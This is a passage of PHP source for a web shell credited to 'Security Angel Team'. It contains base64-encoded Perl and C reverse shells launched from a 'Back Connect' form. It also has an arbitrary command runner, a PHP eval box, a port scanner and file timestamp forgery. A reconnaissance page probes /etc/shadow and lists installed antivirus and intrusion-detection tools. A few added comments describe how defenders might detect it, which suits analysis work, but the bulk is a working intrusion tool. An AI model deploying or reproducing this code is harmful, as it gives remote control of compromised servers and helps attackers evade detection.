" ); fr( $query ); } } } tbfoot(); @mysql_close(); }//end mysql elseif ( $action == 'backconnect' ) { ! $yourip && $yourip = $_SERVER['REMOTE_ADDR']; ! $yourport && $yourport = '12345'; $usedb= array( 'perl' => 'perl', 'c' => 'c' ); $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . 
"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; if ( $start && $yourip && $yourport && $use ) { if ( $use == 'perl' ) { cf( '/tmp/angel_bc', $back_connect ); $res = execute( which( 'perl' ) . " /tmp/angel_bc $yourip $yourport &" ); } else { cf( '/tmp/angel_bc.c', $back_connect_c ); $res = execute( 'gcc -o /tmp/angel_bc /tmp/angel_bc.c' ); @unlink( '/tmp/angel_bc.c' ); $res = execute( "/tmp/angel_bc $yourip $yourport &" ); } m( "Now script try connect to $yourip port $yourport ..." ); } formhead( array( 'title' => 'Back Connect' ) ); makehide( 'action', 'backconnect' ); p( '

' ); p( 'Your IP:' ); makeinput( array( 'name' => 'yourip', 'size' => 20, 'value' => $yourip ) ); p( 'Your Port:' ); makeinput( array( 'name' => 'yourport', 'size' => 15, 'value' => $yourport ) ); p( 'Use:' ); makeselect( array( 'name' => 'use', 'option' => $usedb, 'selected' => $use ) ); makeinput( array( 'name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt' ) ); p( '

' ); formfoot(); }//end elseif ( $action == 'portscan' ) { ! $scanip && $scanip = '127.0.0.1'; ! $scanport && $scanport = '21,25,80,110,135,139,445,1433,3306,3389,5631,43958'; formhead( array( 'title' => 'Port Scan' ) ); makehide( 'action', 'portscan' ); p( '

' ); p( 'IP:' ); makeinput( array( 'name' => 'scanip', 'size' => 20, 'value' => $scanip ) ); p( 'Port:' ); makeinput( array( 'name' => 'scanport', 'size' => 80, 'value' => $scanport ) ); makeinput( array( 'name' => 'startscan', 'value' => 'Scan', 'type' => 'submit', 'class' => 'bt' ) ); p( '

' ); formfoot(); if ( $startscan ) { p( '

Result »

' ); p( '
    ' ); foreach ( explode( ',', $scanport ) as $port ) { $fp = @fsockopen( $scanip, $port, &$errno, &$errstr, 1 ); if ( ! $fp ) { p( '
  • ' . $scanip . ':' . $port . ' ------------------------ Close
  • ' ); } else { p( '
  • ' . $scanip . ':' . $port . ' ------------------------ Open
  • ' ); @fclose( $fp ); } } p( '
' ); } } elseif ( $action == 'eval' ) { $phpcode = trim( $phpcode ); if ( $phpcode ) { if ( ! preg_match( '#<\?#si', $phpcode ) ) { $phpcode = ""; } eval( "?" . ">$phpcode 'Eval PHP Code' ) ); makehide( 'action', 'eval' ); maketext( array( 'title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode ) ); p( '

Get plugins

' ); formfooter(); }//end eval elseif ( $action == 'editfile' ) { if ( file_exists( $opfile ) ) { $fp = @fopen( $opfile, 'r' ); $contents = @fread( $fp, filesize( $opfile ) ); @fclose( $fp ); $contents = htmlspecialchars( $contents ); } formhead( array( 'title' => 'Create / Edit File' ) ); makehide( 'action', 'file' ); makehide( 'dir', $nowpath ); makeinput( array( 'title' => 'Current File (import new file name and new file)', 'name'=> 'editfilename', 'value' => $opfile, 'newline' => 1 ) ); maketext( array( 'title' => 'File Content', 'name' => 'filecontent', 'value' => $contents ) ); formfooter(); goback(); }//end editfile elseif ( $action == 'newtime' ) { $opfilemtime = @filemtime( $opfile ); //$time = strtotime("$year-$month-$day $hour:$minute:$second"); $cachemonth = array( 'January' => 1, 'February'=> 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June'=> 6, 'July'=> 7, 'August'=> 8, 'September' => 9, 'October' => 10, 'November'=> 11, 'December'=> 12 ); formhead( array( 'title' => 'Clone folder/file was last modified time' ) ); makehide( 'action', 'file' ); makehide( 'dir', $nowpath ); makeinput( array( 'title' => 'Alter folder/file', 'name'=> 'curfile', 'value' => $opfile, 'size'=> 120, 'newline' => 1 ) ); makeinput( array( 'title' => 'Reference folder/file (fullpath)', 'name'=> 'tarfile', 'size'=> 120, 'newline' => 1 ) ); formfooter(); formhead( array( 'title' => 'Set last modified' ) ); makehide( 'action', 'file' ); makehide( 'dir', $nowpath ); makeinput( array( 'title' => 'Current folder/file (fullpath)', 'name'=> 'curfile', 'value' => $opfile, 'size'=> 120, 'newline' => 1 ) ); p( '

year:' ); makeinput( array( 'name' => 'year', 'value' => date( 'Y', $opfilemtime ), 'size' => 4 ) ); p( 'month:' ); makeinput( array( 'name' => 'month', 'value' => date( 'm', $opfilemtime ), 'size' => 2 ) ); p( 'day:' ); makeinput( array( 'name' => 'day', 'value' => date( 'd', $opfilemtime ), 'size' => 2 ) ); p( 'hour:' ); makeinput( array( 'name' => 'hour', 'value' => date( 'H', $opfilemtime ), 'size' => 2 ) ); p( 'minute:' ); makeinput( array( 'name' => 'minute', 'value' => date( 'i', $opfilemtime ), 'size' => 2 ) ); p( 'second:' ); makeinput( array( 'name' => 'second', 'value' => date( 's', $opfilemtime ), 'size' => 2 ) ); p( '

' ); formfooter(); goback(); }//end newtime elseif ( $action == 'shell' ) { if ( IS_WIN && IS_COM ) { if ( $program && $parameter ) { $shell = new COM( 'Shell.Application' ); $a = $shell->ShellExecute( $program, $parameter ); m( 'Program run has ' . ( ! $a ? 'success' : 'fail' ) ); } ! $program && $program = 'c:\windows\system32\cmd.exe'; ! $parameter && $parameter = '/c net start > ' . SA_ROOT . 'log.txt'; formhead( array( 'title' => 'Execute Program' ) ); makehide( 'action', 'shell' ); makeinput( array( 'title' => 'Program', 'name'=> 'program', 'value' => $program, 'newline' => 1 ) ); p( '

' ); makeinput( array( 'title' => 'Parameter', 'name' => 'parameter', 'value' => $parameter ) ); makeinput( array( 'name'=> 'submit', 'class' => 'bt', 'type'=> 'submit', 'value' => 'Execute' ) ); p( '

' ); formfoot(); } formhead( array( 'title' => 'Execute Command' ) ); makehide( 'action', 'shell' ); if ( IS_WIN && IS_COM ) { $execfuncdb = array( 'phpfunc' => 'phpfunc', 'wscript' => 'wscript', 'proc_open' => 'proc_open' ); makeselect( array( 'title'=> 'Use:', 'name' => 'execfunc', 'option' => $execfuncdb, 'selected' => $execfunc, 'newline'=> 1 ) ); } p( '

' ); makeinput( array( 'title' => 'Command', 'name'=> 'command', 'value' => htmlspecialchars( $command ) ) ); makeinput( array( 'name' => 'submit', 'class' => 'bt', 'type' => 'submit', 'value' => 'Execute' ) ); p( '

' ); formfoot(); if ( $command ) { p( '
' );
						// Command runner of the 'shell' page: hands $command to the operating system through one of
						// three back ends selected by $execfunc and echoes the result without any escaping.
						// Neither $command nor $execfunc is assigned in this branch; presumably both arrive as the
						// form fields of the same names through the request-variable import at the top of the
						// file (confirm against the full listing).
						// Defender view: a hit shows up as a request carrying action=shell plus a 'command'
						// field, followed by the PHP/web-server worker starting a command interpreter as a child
						// process. Process-creation telemetry on the web tier and integrity monitoring of the web
						// root are the practical places to catch it.
						if ( $execfunc == 'wscript' && IS_WIN && IS_COM ) {
							// Back end 1, taken only when IS_WIN and IS_COM are set (both defined outside this
							// excerpt): creates the WScript.shell COM object, runs the command under
							// "cmd.exe /c" and prints everything read from the child's standard output.
							// disable_functions restricts functions, not the COM class, so it does not close this
							// path; it goes away when PHP's COM support (com_dotnet) is not loaded.
							$wsh = new COM( 'WScript.shell' );
							$exec= $wsh->exec( 'cmd.exe /c ' . $command );
							$stdout= $exec->StdOut();
							$stroutput = $stdout->ReadAll();
							echo $stroutput;
						} elseif ( $execfunc == 'proc_open' && IS_WIN && IS_COM ) {
							// Back end 2, same IS_WIN/IS_COM gate: starts the interpreter named by
							// $_SERVER['COMSPEC'] with pipes on stdin (0), stdout (1) and stderr (2).
							// Listing proc_open in disable_functions blocks this path.
							$descriptorspec = array(
								0 => array( 'pipe', 'r' ),
								1 => array( 'pipe', 'w' ),
								2 => array( 'pipe', 'w' )
							);
							$process= proc_open( $_SERVER['COMSPEC'], $descriptorspec, $pipes );
							if ( is_resource( $process ) ) {
								// The command is typed into the interpreter's stdin, followed by "exit" so the
								// child terminates once the command has run.
								fwrite( $pipes[0], $command . "\r\n" );
								fwrite( $pipes[0], "exit\r\n" );
								fclose( $pipes[0] );
								// stdout is drained to EOF first, then stderr; both are echoed as read.
								while ( ! feof( $pipes[1] ) ) {
									echo fgets( $pipes[1], 1024 );
								}
								fclose( $pipes[1] );
								while ( ! feof( $pipes[2] ) ) {
									echo fgets( $pipes[2], 1024 );
								}
								fclose( $pipes[2] );
								proc_close( $process );
							}
						} else {
							// Back end 3, the default (selector value 'phpfunc' and every non-Windows/non-COM
							// case): delegates to execute(), a helper defined outside this excerpt, and echoes
							// its return value.
							echo( execute( $command ) );
						}
						p( '' );// Publisher's note: replace "prre" with "pre" here by hand (the tag itself appears to have been stripped from this listing)
					}
				}//end shell
				elseif ( $action == 'phpenv' ) {
					// 'phpenv' page: collects host and PHP configuration values into $info for display.
					// Entries 1-9 are printed under the "Server" heading and 10-23 under "PHP" by the loops
					// that follow this block.
					// Defender view: this is the reconnaissance step of the tool. It shows the operator which
					// hardening settings are in force (disable_functions, safe_mode, allow_url_fopen,
					// enable_dl, display_errors), so requests carrying action=phpenv or a 'phpvarname' field
					// in access logs are worth correlating with later activity from the same client.
					// Upload limit is only reported when file_uploads is enabled.
					$upsize= getcfg( 'file_uploads' ) ? getcfg( 'upload_max_filesize' ) : 'Not allowed';
					// Falls back to the sendmail_from setting when the server exposes no SERVER_ADMIN value.
					$adminmail = isset( $_SERVER['SERVER_ADMIN'] ) ? $_SERVER['SERVER_ADMIN'] : getcfg( 'sendmail_from' );
					// $dis_func is set outside this excerpt; an empty value is displayed as 'No'.
					! $dis_func && $dis_func = 'No';
					$info = array(
						// 'h' is the 12-hour clock and the format has no am/pm marker, so the displayed time is ambiguous.
						1=> array( 'Server Time', date( 'Y/m/d h:i:s', $timestamp ) ),
						2=> array( 'Server Domain', $_SERVER['SERVER_NAME'] ),
						// Resolves SERVER_NAME through the resolver; the result is whatever that name maps to.
						3=> array( 'Server IP', gethostbyname( $_SERVER['SERVER_NAME'] ) ),
						4=> array( 'Server OS', PHP_OS ),
						// Despite the label, this is the Accept-Language header sent by the requesting client,
						// not a property of the server.
						5=> array( 'Server OS Charset', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ),
						6=> array( 'Server Software', $_SERVER['SERVER_SOFTWARE'] ),
						7=> array( 'Server Web Port', $_SERVER['SERVER_PORT'] ),
						8=> array( 'PHP run mode', strtoupper( php_sapi_name() ) ),
						// Full on-disk path of this script; useful to responders locating the dropped file.
						9=> array( 'The file path', __FILE__ ),
						10 => array( 'PHP Version', PHP_VERSION ),
						// IS_PHPINFO is a constant defined outside this excerpt.
						11 => array(
							'PHPINFO',
							( IS_PHPINFO ? 'Yes' : 'No' )
						),
						// getcfg() (defined further down in this file) wraps get_cfg_var() and shows values
						// loosely equal to 0 as 'No' and to 1 as 'Yes'.
						12 => array( 'Safe Mode', getcfg( 'safe_mode' ) ),
						13 => array( 'Administrator', $adminmail ),
						14 => array( 'allow_url_fopen', getcfg( 'allow_url_fopen' ) ),
						15 => array( 'enable_dl', getcfg( 'enable_dl' ) ),
						16 => array( 'display_errors', getcfg( 'display_errors' ) ),
						17 => array( 'register_globals', getcfg( 'register_globals' ) ),
						18 => array( 'magic_quotes_gpc', getcfg( 'magic_quotes_gpc' ) ),
						19 => array( 'memory_limit', getcfg( 'memory_limit' ) ),
						20 => array( 'post_max_size', getcfg( 'post_max_size' ) ),
						21 => array( 'upload_max_filesize', $upsize ),
						22 => array( 'max_execution_time', getcfg( 'max_execution_time' ) . ' second(s)' ),
						23 => array( 'disable_functions', $dis_func ),
					);
					// Ad-hoc lookup of a single configuration directive. $phpvarname presumably comes from
					// the form field of the same name below (confirm); m() echoes the string unchanged, so
					// the name is reflected into the page without HTML escaping.
					if ( $phpvarname ) {
						m( $phpvarname . ' : ' . getcfg( $phpvarname ) );
					}
					// Form that posts back to this page (action=phpenv) with the directive name to look up.
					formhead( array( 'title' => 'Server environment' ) );
					makehide( 'action', 'phpenv' );
					makeinput( array(
						'title' => 'Please input PHP configuration parameter(eg:magic_quotes_gpc)',
						'name'=> 'phpvarname',
						'value' => $phpvarname,
						'newline' => 1
					) );
					formfooter();
					// Section headings for the two groups of $info entries.
					$hp = array( 0 => 'Server', 1 => 'PHP' );
					for ( $a = 0; $a < 2; $a ++ ) {
						p( '

' . $hp[ $a ] . ' »

' ); p( '
    ' ); if ( $a == 0 ) { for ( $i = 1; $i <= 9; $i ++ ) { p( '
  • ' . $info[ $i ][0] . ':' . $info[ $i ][1] . '
  • ' ); } } elseif ( $a == 1 ) { for ( $i = 10; $i <= 23; $i ++ ) { p( '
  • ' . $info[ $i ][0] . ':' . $info[ $i ][1] . '
  • ' ); } } p( '
' ); } }//end phpenv elseif ( $action == 'secinfo' ) { secparam( 'Server software', @getenv( 'SERVER_SOFTWARE' ) ); secparam( 'Disabled PHP Functions', ( $GLOBALS['disable_functions'] ) ? $GLOBALS['disable_functions'] : 'none' ); secparam( 'Open base dir', @ini_get( 'open_basedir' ) ); secparam( 'Safe mode exec dir', @ini_get( 'safe_mode_exec_dir' ) ); secparam( 'Safe mode include dir', @ini_get( 'safe_mode_include_dir' ) ); secparam( 'cURL support', function_exists( 'curl_version' ) ? 'enabled' : 'no' ); $temp = array(); if ( function_exists( 'mysql_get_client_info' ) ) { $temp[] = "MySql (" . mysql_get_client_info() . ")"; } if ( function_exists( 'mssql_connect' ) ) { $temp[] = "MSSQL"; } if ( function_exists( 'pg_connect' ) ) { $temp[] = "PostgreSQL"; } if ( function_exists( 'oci_connect' ) ) { $temp[] = "Oracle"; } secparam( 'Supported databases', implode( ', ', $temp ) ); if ( ! IS_WIN ) { $userful = array( 'gcc', 'lcc', 'cc', 'ld', 'make', 'php', 'perl', 'python', 'ruby', 'tar', 'gzip', 'bzip', 'bzip2', 'nc', 'locate', 'suidperl' ); $danger= array( 'kav', 'nod32', 'bdcored', 'uvscan', 'sav', 'drwebd', 'clamd', 'rkhunter', 'chkrootkit', 'iptables', 'ipfw', 'tripwire', 'shieldcc', 'portsentry', 'snort', 'ossec', 'lidsadm', 'tcplodg', 'sxid', 'logcheck', 'logwatch', 'sysmask', 'zmbscap', 'sawmill', 'wormscan', 'ninja' ); $downloaders = array( 'wget', 'fetch', 'lynx', 'links', 'curl', 'get', 'lwp-mirror' ); secparam( 'Readable /etc/passwd', @is_readable( '/etc/passwd' ) ? "yes" : 'no' ); secparam( 'Readable /etc/shadow', @is_readable( '/etc/shadow' ) ? "yes" : 'no' ); secparam( 'OS version', @file_get_contents( '/proc/version' ) ); secparam( 'Distr name', @file_get_contents( '/etc/issue.net' ) ); $safe_mode = @ini_get( 'safe_mode' ); if ( ! 
$GLOBALS['safe_mode'] ) { $temp = array(); foreach ( $userful as $item ) { if ( which( $item ) ) { $temp[] = $item; } } secparam( 'Userful', implode( ', ', $temp ) ); $temp = array(); foreach ( $danger as $item ) { if ( which( $item ) ) { $temp[] = $item; } } secparam( 'Danger', implode( ', ', $temp ) ); $temp = array(); foreach ( $downloaders as $item ) { if ( which( $item ) ) { $temp[] = $item; } } secparam( 'Downloaders', implode( ', ', $temp ) ); secparam( 'Hosts', @file_get_contents( '/etc/hosts' ) ); secparam( 'HDD space', execute( 'df -h' ) ); secparam( 'Mount options', @file_get_contents( '/etc/fstab' ) ); } } else { secparam( 'OS Version', execute( 'ver' ) ); secparam( 'Account Settings', execute( 'net accounts' ) ); secparam( 'User Accounts', execute( 'net user' ) ); secparam( 'IP Configurate', execute( 'ipconfig -all' ) ); } }//end else { m( 'Undefined Action' ); } ?>
Powered by 2011. Copyright (C) 2004-2011 Security Angel Team [S4T] All Rights Reserved.
' . $n . ' »' ); p( '
' ); if ( strpos( $v, "\n" ) === false ) { p( $v . '
' ); } else { p( '
' . $v . '' );//此处prre请手动换成pre
		}
		p( '
' ); } } function m( $msg ) { echo '
'; echo $msg; echo '
'; } function scookie( $key, $value, $life = 0, $prefix = 1 ) { global $timestamp, $_SERVER, $cookiepre, $cookiedomain, $cookiepath, $cookielife; $key = ( $prefix ? $cookiepre : '' ) . $key; $life= $life ? $life : $cookielife; $useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0; setcookie( $key, $value, $timestamp + $life, $cookiepath, $cookiedomain, $useport ); } function multi( $num, $perpage, $curpage, $tablename ) { $multipage = ''; if ( $num > $perpage ) { $page = 10; $offset = 5; $pages= @ceil( $num / $perpage ); if ( $page > $pages ) { $from = 1; $to = $pages; } else { $from = $curpage - $offset; $to = $curpage + $page - $offset - 1; if ( $from < 1 ) { $to = $curpage + 1 - $from; $from = 1; if ( ( $to - $from ) < $page && ( $to - $from ) < $pages ) { $to = $page; } } elseif ( $to > $pages ) { $from = $curpage - $pages + $to; $to = $pages; if ( ( $to - $from ) < $page && ( $to - $from ) < $pages ) { $from = $pages - $page + 1; } } } $multipage = ( $curpage - $offset > 1 && $pages > $page ? 'First ' : '' ) . ( $curpage > 1 ? 'Prev ' : '' ); for ( $i = $from; $i <= $to; $i ++ ) { $multipage .= $i == $curpage ? $i . ' ' : '[' . $i . '] '; } $multipage .= ( $curpage < $pages ? 'Next' : '' ) . ( $to < $pages ? ' Last' : '' ); $multipage = $multipage ? '

Pages: ' . $multipage . '

' : ''; } return $multipage; } // 登陆入口 function loginpage() { ?> Password: Can not connect to MySQL server' ); exit; } if ( $link && $dbname ) { if ( ! @mysql_select_db( $dbname, $link ) ) { p( '

Database selected has error

' ); exit; } } if ( $link && mysql_get_server_info() > '4.1' ) { if ( $charset && in_array( strtolower( $charset ), $charsetdb ) ) { q( "SET character_set_connection=$charset, character_set_results=$charset, character_set_client=binary;", $link ); } } return $link; } // 去掉转义字符 function s_array( &$array ) { if ( is_array( $array ) ) { foreach ( $array as $k => $v ) { $array[ $k ] = s_array( $v ); } } else if ( is_string( $array ) ) { $array = stripslashes( $array ); } return $array; } // 清除HTML代码 function html_clean( $content ) { $content = htmlspecialchars( $content ); $content = str_replace( "\n", "
", $content ); $content = str_replace( "", "  ", $content ); $content = str_replace( "\t", "    ", $content ); return $content; } // 获取权限 function getChmod( $filepath ) { return substr( base_convert( @fileperms( $filepath ), 10, 8 ), - 4 ); } function getPerms( $filepath ) { $mode = @fileperms( $filepath ); if ( ( $mode & 0xC000 ) === 0xC000 ) { $type = 's'; } elseif ( ( $mode & 0x4000 ) === 0x4000 ) { $type = 'd'; } elseif ( ( $mode & 0xA000 ) === 0xA000 ) { $type = 'l'; } elseif ( ( $mode & 0x8000 ) === 0x8000 ) { $type = '-'; } elseif ( ( $mode & 0x6000 ) === 0x6000 ) { $type = 'b'; } elseif ( ( $mode & 0x2000 ) === 0x2000 ) { $type = 'c'; } elseif ( ( $mode & 0x1000 ) === 0x1000 ) { $type = 'p'; } else { $type = '?'; } $owner['read']= ( $mode & 00400 ) ? 'r' : '-'; $owner['write'] = ( $mode & 00200 ) ? 'w' : '-'; $owner['execute'] = ( $mode & 00100 ) ? 'x' : '-'; $group['read']= ( $mode & 00040 ) ? 'r' : '-'; $group['write'] = ( $mode & 00020 ) ? 'w' : '-'; $group['execute'] = ( $mode & 00010 ) ? 'x' : '-'; $world['read']= ( $mode & 00004 ) ? 'r' : '-'; $world['write'] = ( $mode & 00002 ) ? 'w' : '-'; $world['execute'] = ( $mode & 00001 ) ? 'x' : '-'; if ( $mode & 0x800 ) { $owner['execute'] = ( $owner['execute'] == 'x' ) ? 's' : 'S'; } if ( $mode & 0x400 ) { $group['execute'] = ( $group['execute'] == 'x' ) ? 's' : 'S'; } if ( $mode & 0x200 ) { $world['execute'] = ( $world['execute'] == 'x' ) ? 't' : 'T'; } return $type . $owner['read'] . $owner['write'] . $owner['execute'] . $group['read'] . $group['write'] . $group['execute'] . $world['read'] . $world['write'] . $world['execute']; } function getUser( $filepath ) { if ( function_exists( 'posix_getpwuid' ) ) { $array = @posix_getpwuid( @fileowner( $filepath ) ); if ( $array && is_array( $array ) ) { return ' / ' . $array['name'] . ''; } } return ''; } // 删除目录 function deltree( $deldir ) { $mydir = @dir( $deldir ); while ( $file = $mydir->read() ) { if ( ( is_dir( $deldir . '/' . $file ) ) && ( $file != '.' 
) && ( $file != '..' ) ) { @chmod( $deldir . '/' . $file, 0777 ); deltree( $deldir . '/' . $file ); } if ( is_file( $deldir . '/' . $file ) ) { @chmod( $deldir . '/' . $file, 0777 ); @unlink( $deldir . '/' . $file ); } } $mydir->close(); @chmod( $deldir, 0777 ); return @rmdir( $deldir ) ? 1 : 0; } // 表格行间的背景色替换 function bg() { global $bgc; return ( $bgc ++ % 2 == 0 ) ? 'alt1' : 'alt2'; } // 获取当前的文件系统路径 function getPath( $scriptpath, $nowpath ) { if ( $nowpath == '.' ) { $nowpath = $scriptpath; } $nowpath = str_replace( '\\', '/', $nowpath ); $nowpath = str_replace( '//', '/', $nowpath ); if ( substr( $nowpath, - 1 ) != '/' ) { $nowpath = $nowpath . '/'; } return $nowpath; } // 获取当前目录的上级目录 function getUpPath( $nowpath ) { $pathdb = explode( '/', $nowpath ); $num= count( $pathdb ); if ( $num > 2 ) { unset( $pathdb[ $num - 1 ], $pathdb[ $num - 2 ] ); } $uppath = implode( '/', $pathdb ) . '/'; $uppath = str_replace( '//', '/', $uppath ); return $uppath; } // 检查PHP配置参数 function getcfg( $varname ) { $result = get_cfg_var( $varname ); if ( $result == 0 ) { return 'No'; } elseif ( $result == 1 ) { return 'Yes'; } else { return $result; } } // 检查函数情况 function getfun( $funName ) { return ( false !== function_exists( $funName ) ) ? 'Yes' : 'No'; } // 获得文件扩展名 function getext( $file ) { $info = pathinfo( $file ); return $info['extension']; } function GetWDirList( $dir ) { global $dirdata, $j, $nowpath; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' 
&& is_dir( $f ) ) { if ( is_writable( $f ) ) { $dirdata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $dirdata[ $j ]['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $f ) ); $dirdata[ $j ]['dirchmod']= getChmod( $f ); $dirdata[ $j ]['dirperm'] = getPerms( $f ); $dirdata[ $j ]['dirlink'] = $dir; $dirdata[ $j ]['server_link'] = $f; $j ++; } GetWDirList( $f ); } } closedir( $dh ); clearstatcache(); return $dirdata; } else { return array(); } } function GetWFileList( $dir ) { global $filedata, $j, $nowpath, $writabledb; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $ext = getext( $file ); $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' && is_dir( $f ) ) { GetWFileList( $f ); } elseif ( $file != '.' && $file != '..' && is_file( $f ) && in_array( $ext, explode( ',', $writabledb ) ) ) { if ( is_writable( $f ) ) { $filedata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $filedata[ $j ]['size']= sizecount( @filesize( $f ) ); $filedata[ $j ]['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $f ) ); $filedata[ $j ]['filechmod'] = getChmod( $f ); $filedata[ $j ]['fileperm']= getPerms( $f ); $filedata[ $j ]['fileowner'] = getUser( $f ); $filedata[ $j ]['dirlink'] = $dir; $filedata[ $j ]['server_link'] = $f; $j ++; } } } closedir( $dh ); clearstatcache(); return $filedata; } else { return array(); } } function GetSFileList( $dir, $content, $re = 0 ) { global $filedata, $j, $nowpath, $writabledb; ! $j && $j = 1; if ( $dh = opendir( $dir ) ) { while ( $file = readdir( $dh ) ) { $ext = getext( $file ); $f = str_replace( '//', '/', $dir . '/' . $file ); if ( $file != '.' && $file != '..' && is_dir( $f ) ) { GetSFileList( $f, $content, $re = 0 ); } elseif ( $file != '.' && $file != '..' && is_file( $f ) && in_array( $ext, explode( ',', $writabledb ) ) ) { $find = 0; if ( $re ) { if ( preg_match( '@' . $content . '@', $file ) || preg_match( '@' . $content . 
'@', @file_get_contents( $f ) ) ) { $find = 1; } } else { if ( strstr( $file, $content ) || strstr( @file_get_contents( $f ), $content ) ) { $find = 1; } } if ( $find ) { $filedata[ $j ]['filename']= str_replace( $nowpath, '', $f ); $filedata[ $j ]['size']= sizecount( @filesize( $f ) ); $filedata[ $j ]['mtime'] = @date( 'Y-m-d H:i:s', filemtime( $f ) ); $filedata[ $j ]['filechmod'] = getChmod( $f ); $filedata[ $j ]['fileperm']= getPerms( $f ); $filedata[ $j ]['fileowner'] = getUser( $f ); $filedata[ $j ]['dirlink'] = $dir; $filedata[ $j ]['server_link'] = $f; $j ++; } } } closedir( $dh ); clearstatcache(); return $filedata; } else { return array(); } } function qy( $sql ) { global $mysqllink; //echo $sql.'
'; $res = $error = ''; if ( ! $res = @mysql_query( $sql, $mysqllink ) ) { return 0; } else if ( is_resource( $res ) ) { return 1; } else { return 2; } return 0; } function q( $sql ) { global $mysqllink; return @mysql_query( $sql, $mysqllink ); } function fr( $qy ) { mysql_free_result( $qy ); } function sizecount( $fileSize ) { $size = sprintf( "%u", $fileSize ); if ( $size == 0 ) { return '0 Bytes'; } $sizename = array( ' Bytes', ' KB', ' MB', ' GB', ' TB', ' PB', ' EB', ' ZB', ' YB' ); return round( $size / pow( 1024, ( $i = floor( log( $size, 1024 ) ) ) ), 2 ) . $sizename[ $i ]; } // 备份数据库 function sqldumptable( $table, $fp = 0 ) { global $mysqllink; $tabledump = "DROP TABLE IF EXISTS `$table`;\n"; $res = q( "SHOW CREATE TABLE $table" ); $create= mysql_fetch_row( $res ); $tabledump .= $create[1] . ";\n\n"; if ( $fp ) { fwrite( $fp, $tabledump ); } else { echo $tabledump; } $tabledump = ''; $rows= q( "SELECT * FROM $table" ); while ( $row = mysql_fetch_assoc( $rows ) ) { foreach ( $row as $k => $v ) { $row[ $k ] = "'" . @mysql_real_escape_string( $v ) . "'"; } $tabledump = 'INSERT INTO `' . $table . '` VALUES (' . implode( ", ", $row ) . ');' . "\n"; if ( $fp ) { fwrite( $fp, $tabledump ); } else { echo $tabledump; } } fwrite( $fp, "\n\n" ); fr( $rows ); } function p( $str ) { echo $str . "\n"; } function tbhead() { p( '' ); } function tbfoot() { p( '
' ); } function makehide( $name, $value = '' ) { p( "" ); } function makeinput( $arg = array() ) { $arg['size']= $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\""; $arg['extra'] = $arg['extra'] ? $arg['extra'] : ''; ! $arg['type'] && $arg['type'] = 'text'; $arg['title'] = $arg['title'] ? $arg['title'] . '
' : ''; $arg['class'] = $arg['class'] ? $arg['class'] : 'input'; if ( $arg['newline'] ) { p( "

$arg[title]

